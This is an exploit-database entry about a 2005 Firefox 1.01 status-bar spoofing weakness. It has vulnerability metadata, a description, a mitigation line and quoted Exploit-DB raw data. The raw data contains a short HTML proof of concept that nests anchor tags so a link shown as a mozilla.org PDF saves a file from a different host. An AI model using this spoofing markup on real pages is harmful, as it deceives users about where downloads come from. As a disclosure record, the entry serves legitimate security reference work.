header-logo
Suggest Exploit
vendor:
Firefox
by:
SecurityFocus
3.3
CVSS
MEDIUM
URI Obfuscation Weakness
20
CWE
Product Name: Firefox
Affected Version From: 01.01
Affected Version To: 01.01
Patch Exists: NO
Related CWE: N/A
CPE: a:mozilla:firefox
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2005

Firefox 1.01 : spoofing status bar without using JavaScript

Mozilla Suite/Firefox and Thunderbird are reported prone to a URI obfuscation weakness. The issue is reported to manifest when 'Save Link As...' functionality is invoked on an malicious anchor tag. This issue may be leveraged by an attacker to display false information in the status bar of an unsuspecting user, allowing an attacker to present downloads to users that seem to originate from a trusted location. This may facilitate attacks based on this false sense of trust.

Mitigation:

Ensure that users are aware of the potential for malicious anchor tags to be used to spoof the status bar. Additionally, users should be aware of the potential for malicious downloads to be presented as originating from a trusted source.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12798/info

Mozilla Suite/Firefox and Thunderbird are reported prone to a URI obfuscation weakness. The issue is reported to manifest when 'Save Link As...' functionality is invoked on an malicious anchor tag.

This issue may be leveraged by an attacker to display false information in the status bar of an unsuspecting user, allowing an attacker to present downloads to users that seem to originate from a trusted location. This may facilitate attacks based on this false sense of trust. 

<h1>Firefox 1.01 : spoofing status bar without using JavaScript</h1>
<p>Save the New Features about Firefox 1.02 ( PDF 20K )</p>
<p>Right Click and Save Link as ...<p>
<div>

<a href="http://www.mozilla.org/features_ff102.pdf">
<table><tr><td>
<a href="http://www.tpc.org/tpch/spec/tpch2.1.0.pdf">download : http://www.mozilla.org/features_ff102.pdf
</a><!-- first -->
</td></tr></table>
</a><!-- second -->

</div>

Navigation

Suggest Exploit

Services By CQR